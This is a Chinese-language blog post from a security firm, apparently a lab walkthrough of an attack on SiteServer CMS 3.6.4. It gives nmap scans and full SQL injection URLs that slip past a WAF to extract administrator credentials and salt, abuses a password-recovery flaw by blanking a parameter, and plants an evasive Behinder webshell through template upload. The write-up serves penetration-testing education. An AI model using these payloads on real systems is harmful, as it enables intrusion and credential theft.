 前言: 欲善其事,必先利其器。继研究内网渗透测试后,小星最近在开始研究内网漫游,希望通过与大家分享不同内网漫游方式的可行性,让大家充分理解每个漏洞的原理。本期文章将从渗透过程、sql注入、密码找回漏洞三部分展开分析。 (一)基本配置 本次靶场拓扑图如下所示,且内网主机带有杀软。 (二)渗透过程 1.探测当前网段存活主机。 nmap -sP 192.168.0.0/24 2.对目标主机192.168.0.114进行端口扫描,可发现80 3389等端口已被开放。 nmap -sS --open -Pn -p- -v 192.168.0.114 3.将当前主机绑定host后,访问网站http://www./。  4. 扫描网站目录,发现网站存在安全狗拦截封IP,此时要访问robots.txt存在的三个目录。 5. 访问/siteserver/目录,发现当前系统是siteserver,版本为3.6.4。 6. 搜索该系统的漏洞,发现存在sql注入和密码找回漏洞。 (三)sql注入 您可直接使用网上搜索到的payload进行注入,可利用的注入点有很多。但这里使用user.asspx来进行注入,因为常规的注入会被安全狗拦截,所以此处也使用符合“~”绕过拦截。 1. 获取数据库版本信息。 http://www./usercenter/platform/user.aspx?UnLock=sdfe'&UserNameCollection=test') and ~1=@@version--+ 2. 获取当前数据库名称。 http://www./usercenter/platform/user.aspx?UnLock=sdfe'&UserNameCollection=test') and ~1=db_name()--+ 3.网上搜索SiteServer CMS的表结构说明即可直接读取管理员的账号密码。 3.1 获取管理员账号。 http://www./usercenter/platform/user.aspx?UnLock=sdfe'&UserNameCollection=test') and ~1= (select top 1 username from.msmoonlab.bairong_Administrator)--+ 3.2 获取管理员密码密文。 http://www./usercenter/platform/user.aspx?UnLock=sdfe'&UserNameCollection=test') and ~1=(select top 1 password from.msmoonlab.bairong_Administrator)--+ 3.3 获取密码密文salt。 http://www./usercenter/platform/user.aspx?UnLock=sdfe'&UserNameCollection=test') and ~1=(select top 1 passwordSaltfrom.msmoonlab.bairong_ Administrator)--+ 3.4 紧接着需要对密文进行解密,但此处因为代码不明,所以暂不处理。 (四)密码找回漏洞 除了sql注入,大家还可以尝试利用密码找回逻辑漏洞,以获取管理员的账号密码。 1. 点击忘记密码,输入管理员账号,点击下一步,随意输入问题的回答内容。 2. 点击下一步并抓包,将数据包中的参数Answer的值置为空, 3. 释放数据包,在前端成功获取到管理员账号密码。 4.至此已经获取到管理员后台账号密码,网上搜索siteserver后台getshell的方法。 4.1 getshell方法1: (1)进入后台,点击模版管理,在添加首页模版或者添加单页模版均可getshell。 (2)此处点击添加单页模版,文件扩展名选择.aspx。经过前面的渗透测试,我们已经知道当前网站存在安全狗,所以需要免杀的webshell来插入冰蝎的aspx webshell代码。 (3)访问http://www./.aspx,如下所示。 (4)冰蝎成功连接。 4.2 getshell方法2: (1)系统管理-->站点模版管理:点击导入站点模版,选择上传压缩包并导入,将冰蝎的aspx进行压缩。 (2)上传成功后,点击站点文件管理,上传的zip文件可以在\SiteFiles\SiteTemplates\目录下自解压,如下所示。 (3)直接访问网站,如下所示。 http://www./SiteFiles/SiteTemplates/shell/shell.aspx, (4)使用冰蝎成功连接。 (5)成功连接后,首先进行简单的信息搜集,您可发现当前用户权限较低。 (6)当前主机存在多个用户,其中有护卫神相关的用户名称。 (五)分享预告 下周,我们将继续从如何通过提权操作、提权免杀和用其它方式绕过安全拦截等方面,与大家继续分享如何能够绕杀软拿域控。 (六)了解小星,了解星云博创 星云博创科技有限公司(简称“星云博创”)成立于2016年,是国内新兴的网络安全产品、可信安全管理平台、专业安全服务与解决方案的综合提供商。星云博创设北京为北方总部,广州为南方总部,并于成都、合肥、南昌、贵州、武汉、太原、哈尔滨等多个城市设立分支机构。同时,星云博创为不断完善客户服务体系和应急响应体系,在全国10余个省、市、自治区、直辖市建立三级服务支持中心,7×24小时接受客户需求,及时提供标准一致的安全服务。 作为一家以技术先导的企业,星云博创始终坚持在网络安全、数据安全、态势感知、等级保护、合规性安全管理等领域进行技术创新,利用安全分析、大数据分析、人工智能等技术,对网络空间安全要素、安全风险进行深度挖掘与关联分析,构建了多层次的纵深防御体系,持续推出态势感知平台、静态脱敏系统、终端安全监测系统等一系列优秀的安全产品和行业解决方案,广泛应用于政府、运营商、医疗、教育、电力、能源等多个领域,让风险无所遁形。 星云博创已获得ISO9001、ISO27001、 ISO20000管理体系认证,CMMI5软件成熟度认证,信息系统安全集成服务、信息安全风险评估服务、软件安全开发服务资质的CCRC二级认证,及安全运维服务资质、应急处理服务资质的CCRC三级认证。此外,星云博创还是国家信息安全漏洞库(CNNVD)技术支撑单位、海南省网络安全应急技术支撑单位、广州市应急联动机构支撑单位。 |
|
|
